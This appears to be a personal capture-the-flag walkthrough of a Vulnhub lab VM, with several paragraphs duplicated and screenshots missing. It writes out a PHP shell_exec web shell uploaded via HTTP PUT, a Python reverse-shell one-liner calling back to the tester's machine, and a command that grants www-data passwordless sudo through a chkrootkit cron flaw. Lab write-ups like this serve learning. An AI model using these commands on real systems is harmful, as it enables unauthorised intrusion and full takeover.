I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)
This VM was tricky towards the end as normal scripts etc didn't work. I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.
So big thanks to Vulnhub and D4rk36 for this :)
scan
This VM was tricky towards the end as normal scripts etc didn't work. I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.
So big thanks to Vulnhub and D4rk36 for this :)
scan
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST
Nmap scan report for 192.168.1.7
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds
ssh
I'll see what ssh yields:
root@kali:~/Downloads# ssh 192.168.1.7
.oooooo..o o8o oooo .oooooo. .o .oooo.
d8P' `Y8 `"' `888 d8P' `Y8b o888 .dP""Y88b
Y88bo. oooo .ooooo. 888 oooo 888 888 .oooo.o 888 ]8P'
`"Y8888o. `888 d88' `"Y8 888 .8P' 888 888 d88( "8 888 .d8P'
`"Y88b 888 888 888888. 888 888 `"Y88b. 888 .dP'
oo .d8P 888 888 .o8 888 `88b. `88b d88' o. )88b 888 .o. .oP .o
8""88888P' o888o `Y8bod8P' o888o o888o `Y8bood8P' 8""888P' o888o Y8P 8888888888
By @D4rk36
root@192.168.1.7's password:
Not alot apart from nice ASCII art :D
I'll try port 80 then!
http
Navigating to the ip gives the following page.
root@kali:~/Downloads# ssh 192.168.1.7
.oooooo..o o8o oooo .oooooo. .o .oooo.
d8P' `Y8 `"' `888 d8P' `Y8b o888 .dP""Y88b
Y88bo. oooo .ooooo. 888 oooo 888 888 .oooo.o 888 ]8P'
`"Y8888o. `888 d88' `"Y8 888 .8P' 888 888 d88( "8 888 .d8P'
`"Y88b 888 888 888888. 888 888 `"Y88b. 888 .dP'
oo .d8P 888 888 .o8 888 `88b. `88b d88' o. )88b 888 .o. .oP .o
8""88888P' o888o `Y8bod8P' o888o o888o `Y8bood8P' 8""888P' o888o Y8P 8888888888
By @D4rk36
root@192.168.1.7's password:
Not alot apart from nice ASCII art :D
I'll try port 80 then!
http
Navigating to the ip gives the following page.
The source code contains no hints, so I'll see if there is anything hidden:
root@kali:~/Downloads# dirb http://192.168.1.7 -w
•
• -----------------
• DIRB v2.22
• By The Dark Raver
• -----------------
•
• START_TIME: Sat Oct 8 16:22:08 2016
• URL_BASE: http://192.168.1.7/
• WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
• OPTION: Not Stoping on warning messages
•
• -----------------
•
• GENERATED WORDS: 4612
•
• ---- Scanning URL: http://192.168.1.7/ ----
• + http://192.168.1.7/index.php (CODE:200|SIZE:163)
• ==> DIRECTORY: http://192.168.1.7/test/
•
• ---- Entering directory: http://192.168.1.7/test/ ----
• (!) WARNING: Directory IS LISTABLE. No need to scan it.
• (Use mode '-w' if you want to scan it anyway)
•
Let's see what /test yields:
Hmmm....
I try and see if there is anything in the way of known weaknesses in lighttpd/1.4.28 but I come away empty handed.
There must be a way to upload to this page....... Hang on!!! What methods are available on this web page can I PUT??
Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell so pentestmonkey's one should do!! (http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
I upload it using nmap's scripting engine:
I upload it using nmap's scripting engine:
Check to see if it's there:
Awesome! I set my netcat listener on port 443 then click the file.
Agh!!!
That failed miserably :(
Ok, I wonder if I can get a dirty shell on it? I use the one liner:
<?php echo shell_exec($_GET['cmd']); ?>
That failed miserably :(
Ok, I wonder if I can get a dirty shell on it? I use the one liner:
<?php echo shell_exec($_GET['cmd']); ?>
Run the command via the browser:
Sweet!! Now I can try and throw a python listener my way. I use 443 as it's a web port so less likely to be blocked:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And the result is:
Hurrah!!!
Now to start enumerating:
Ok happy with the release details now to see if I can write anywhere:
I can write to /tmp but when I upload my enumeration script it doesn't allow me to execute it :(
I start to enumerate manually and eventually find some things in the crontab:
I can write to /tmp but when I upload my enumeration script it doesn't allow me to execute it :(
I start to enumerate manually and eventually find some things in the crontab:
I'll check out the daily one:
Ok some stuff in here time to start looking at their code.
After sifting through the code nothing jumps out at me so I revert to Google to see if the file "chkrootkit" has any flaws.
Exploit-DB comes up trumps with this https://www.exploit-db.com/exploits/33899/
Exploit-DB comes up trumps with this https://www.exploit-db.com/exploits/33899/
Awesome!! Now to create that /tmp/update file and leverage me some privileges!!
Inside the file I put:
chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
Inside the file I put:
chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
This should give my www-data account sudo rights without a password :)
The cronjob runs and:
The cronjob runs and:
I am root :)
Let's see what is lurking within:
Phew!! This made me stretch the old grey matter!!!!
